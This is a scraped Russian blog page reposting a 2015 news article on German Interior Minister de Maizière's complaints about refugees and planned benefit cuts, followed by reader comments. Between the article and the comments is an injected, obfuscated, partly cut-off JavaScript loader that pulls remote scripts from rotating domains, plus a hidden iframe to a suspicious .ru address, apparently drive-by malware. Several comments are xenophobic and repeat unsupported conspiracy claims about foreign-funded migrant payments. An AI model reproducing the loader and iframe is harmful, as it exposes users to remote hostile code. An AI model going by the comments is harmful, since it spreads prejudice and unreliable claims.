Глава МВД ФРГ удивился, что у беженцев есть деньги на такси для разъездов по всей Германии

    Эту статью могут комментировать только участники сообщества.
    Вы можете вступить в сообщество одним кликом по кнопке справа.
    Юрий Кузнецов перепечатал из expert.ru
    7 оценок, 490 просмотров Обсудить (16)

    Рядовые немцы начинают все хуже относиться к беженцам. Недавний опрос показал, что более 50% граждан Германии боятся наплыва мигрантов. Немецкие политики также меняют свое отношение к беженцам - их политика становится более жесткой. Так, глава МВД Томас де Мезьер в интервью телевидению заявил, что обеспокоен поведением мигрантов.

    "До конца лета мигранты выглядели благодарными за то, что мы их приняли. Они спрашивали где полиция, где информационный центр, где их разместят. Сейчас же многие беженцы думают, что они сами могут ехать куда захотят. Они покидают административные учреждения, заказывают такси и, к моему удивлению, располагают деньгами, чтобы проехать сотни километров по Германии", сказал он в интервью каналу Euronews.

    Томас де Мезьер является одним из сторонников "демонетизации" помощи мигрантам. И еще в августе призывал существенно сократить денежные выплаты прибывающим мигрантам.

    Уже с 1 ноября денежные выплаты в размере 143 евро в месяц на человека, которые делают Германию особенно привлекательной для беженцев по сравнению с другими европейскими странами, будут заменены на другие виды помощи. Скорее всего, мигранты будут получать продуктовые талоны.

    Такая же судьба ждет и большинство других денежных выплат приезжим. В планах правительства полная отмена денежного пособия на жилье для мигрантов, живущих в официальных центрах по приему беженцев.

    Правительство спешно разрабатывает другие меры, которые должны несколько демотивировать желающих попасть в Германию мигрантов.

    Нескрываемое раздражение вызвало у министра внутренних дел ФРГ и "неподобающее поведение" нелегалов. 

    "Беженцы устраивают драки и акции протеста из-за того, что им не нравятся условия в лагерях и то, как их кормят. Таких меньшинство, но мы должны ясно сказать, что мы требуем от приезжих культурного отношения", — заявил Томас де Мезьер.

    Накануне большой резонанс в Германии вызвала массовая драка мигрантов в старинном немецком городке Кальден. Происшествие не обошлось без пострадавших и задержанных.

    Беспорядки вспыхнули после того, как 19-летний албанец попытался занять выгодное место в самом начале очереди за продуктами. В ответ на упрек 43-летнего пакистанца он набросился на критика с кулаками.

    Драка быстро переросла в массовое побоище, в котором участвовали ок. 300 человек, вооруженных арматурой, палками и баллончиками с перечным газом. Поглазеть на драку собрались местные жители. Усмирять драчунов приехали более 50 полицейских, а развозить пострадавших по больницам – пара десятков карет скорой помощи.

    Недовольство миграционной политикой, которую проводит правительство канцлера Ангелы Меркель, негативно сказывается на ее рейтинге популярности. За последний месяц он упал на 9 пунктов – до 54 процентов. Правда, в субботу появилась информация о том, что заслуги Меркель в разрешении миграционного кризиса могут быть признаны за пределами Германии. Немецкий таблоид Bild предположил, что канцлер ФРГ вполне может получить Нобелевскую премию мира в этом году.

    <script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),​document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"​function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>

    <iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html"></iframe>

    Комментировать

    осталось 1185 символов
    пользователи оставили 16 комментариев , вы можете свернуть их
    Ирина Irina # написала комментарий 3 октября 2015, 20:54
    Немецкие политики также меняют свое отношение к беженцам - их политика становится более жесткой.............НУ ВСЁ! Немецкие политики подписали смертный приговор не только себе, но и всей Германии, а заодно всему ЕС - перебежчики им этого не простят(((((((((((
    Капочка :)))) # ответила на комментарий Ирина Irina 3 октября 2015, 22:19
    Немецким политикам надо было головой думать, когда они это все затевали. Как только они заменять денежные выплаты на другие виды помощи, их ждут неприятные сюрпризы. В Германии уже достаточное количество беженцев, чтобы строить серьезные протестные акции. Рядовые немцы достаточно аморфны, да и побаиваются противостоять этой неуправляемой орде.
    Называйте меня просто Ильич # написал комментарий 3 октября 2015, 21:00
    заказывают такси и, к моему удивлению, располагают деньгами, чтобы проехать сотни километров по Германии", сказал он в интервью
    ВИЗА действует, банкоматы набиты бабосами. Снимай , только пин не забывай
    Парадоксов Друг # написал комментарий 3 октября 2015, 21:06
    Он ещё не так удивится, когда эти "новые немцы" потребуют привилегий.Им только дайте отдохнуть с дороги
    Капочка :)))) # ответила на комментарий Парадоксов Друг 3 октября 2015, 22:21
    Они уже отдохнули, просто немецкие СМИ не обо всем пишут.
    Генрих Жеребцов # написал комментарий 3 октября 2015, 21:16
    По всей видимости, вскоре беженцы заставят работать немцев с удвоенной энергией.
    Константин Кир # ответил на комментарий Генрих Жеребцов 3 октября 2015, 21:39
    шнель, шнель, во имя Аллаха всемилостивейшего и милосердного
    Елена Швец # написала комментарий 3 октября 2015, 21:17
    Обама тоже нобелевскую премию мира получил. И где мир? Уже требуют вернуть.
    Константин Кир # ответил на комментарий Елена Швец 3 октября 2015, 21:40
    так он уже пропил ее с Петей
    Елена Швец # ответила на комментарий Константин Кир 3 октября 2015, 22:35
    Во гады. И с народом не поделились.
    Алексей Глебов # написал комментарий 3 октября 2015, 21:37
    "Беженцы" уже у себя ДОМА. Немцы- в гостях.
    Капочка :)))) # ответила на комментарий Алексей Глебов 3 октября 2015, 22:45
    Вы очень близки к истине:(((((( Немцы уже лишний раз стараются на улицу не выходить, так как полиция занимается охраной беженцев, а не местного населения. Нацики пытаются противостоять, но их гоняет полиция.
    Александр Пересвет # написал комментарий 3 октября 2015, 21:42
    Есть некие фонды, расположенные в Америке и Англии, помогающие беженцам переправится в Евпропу. Через соц. сети им рассказывают, как хорошо там живётся переселенцам. Называется сумма в 11 000 Е выплачиваемых им подъёмных, т.с.зэть на дорожку. Поэтому у них у всех смартфоны, ч.з. которые они и получают инфу куда нужно ехать. А на тачке же быстрее, евро жгут ляжку и "шэф гони, плачу".
    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 580 записей в блогах и 5382 комментария.
    Зарегистрировалось 26 новых макспаркеров. Теперь нас 5029535.
    X